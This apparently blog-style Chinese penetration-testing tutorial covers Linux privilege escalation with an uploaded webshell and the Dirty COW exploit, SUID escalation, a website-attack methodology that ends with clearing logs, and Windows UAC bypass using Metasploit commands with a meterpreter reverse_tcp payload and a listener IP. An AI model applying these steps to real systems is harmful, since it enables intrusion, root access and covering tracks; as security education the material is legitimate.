渗透测试 知乎_渗透提权测试

hacker|
150

渗透测试之Linux下提权

直接在kali里面启用apache服务

1:在终端输入“vim /etc/apache2/ports.conf” - 键盘输入i 进入插入编辑模式 - 修改apache2默认监听端口号为8080 - 编辑好后,按Esc键+“:wq” 保存退出 - 在终端输入“/etc/init.d/apache2 start”

2:- 在浏览器地址栏输入“”

直接用kali下的默认web站点   网站环境就不搭建了  直接在网站根目录下上传一个大马  前面挖洞传webshell就跳过了  直接开始提权

上传一个大马上去

先用大马将脏牛提权利用工具上传到服务器上

执行

利用gcc编译dirty.c文件

再执行./dirty  运行dirty

最下面一行是恢复回原先root账号密码的方法

这里就不切换到脏牛创建的用户了

什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。

首先在本地查找符合条件的文件,有以下三个命令

常用的可用于suid提权的文件

我得Linux系统里面一个也没有 这个就过去了 百度也有一些关于SUID提权的文章

Linux提权有很多大牛开发好的提权工具可以参考以下网址

网站渗透测试,怎么进行

1.信息收集:

1)、获取域名的whois信息,获取注册者邮箱姓名电话等。

2)、查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。

3)、查看服务器操作系统版本,web中间件,看看是否存在已知的漏洞,比如IIS,APACHE,NGINX的解析漏洞。

4)、查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,比如 rsync,心脏出血,mysql,ftp,ssh弱口令等。

5)、扫描网站目录结构,看看是否可以遍历目录,或者敏感文件泄漏,比如php探针。

6)、google hack 进一步探测网站的信息,后台,敏感文件。

2.漏洞扫描:

开始检测漏洞,如XSS,XSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,下载,文件包含, 远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等。

3.漏洞利用:

利用以上的方式拿到webshell,或者其他权限。

4.权限提升:

提权服务器,比如windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉, linux藏牛漏洞,linux内核版本漏洞提权,linux下的mysql system提权以及oracle低权限提权。

5.日志清理:

结束渗透测试工作需要做的事情,抹除自己的痕迹。

需要规避的风险:

1. 不执行任何可能引起业务中断的攻击(包括资源耗竭型DoS,畸形报文攻击,数据破坏)。

2. 测试验证时间放在业务量最小的时间进行。

3. 测试执行前确保相关数据进行备份

4. 所有测试在执行前和维护人员进行沟通确认。

渗透测试之内网提权

UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限。

当前获得的权限是存在于管理员组的时候但是并且是administrator这个用户,此时就可能需要我们进行绕过UAC的操作,否则虽然是管理员组但是实际上并没有管理员所对应的高权限操作,这个时候就需要bypass uac

开始提权

getsystem

提权失败   一般都是上面说的uac的问题  常识  bypass uac

输入background   让该会话在后台运行  不在这个模式下 没办法调用msf的提权模块

使用提权工具

set SESSION 2(这个session要和之前监听的那个session一样  否则不成功)

set TECHNIQUE up.exe

set TECHNIQUE EXE

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.107

show options

sessions -i

exploit

或者使用

use post/windows/gather/enum_patches

需要设置一下session

如果目标系统安装了安全更新的话是无法提权成功的

出现这种情况就是无法成功提权  可利用的漏洞都被打上补丁了

或者漏洞编号:ms11-080

windows 7、8、08、12、16下可以成功  2003也可以

关于sc命令:

SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于“控制面板”中“管理工具”项中的“服务”。

这个命令的意思是创建一个名叫syscmd的新的交互式的cmd服务

然后执行

sc start systcmd,就得到了一个system权限的cmd环境

0条大神的评论

发表评论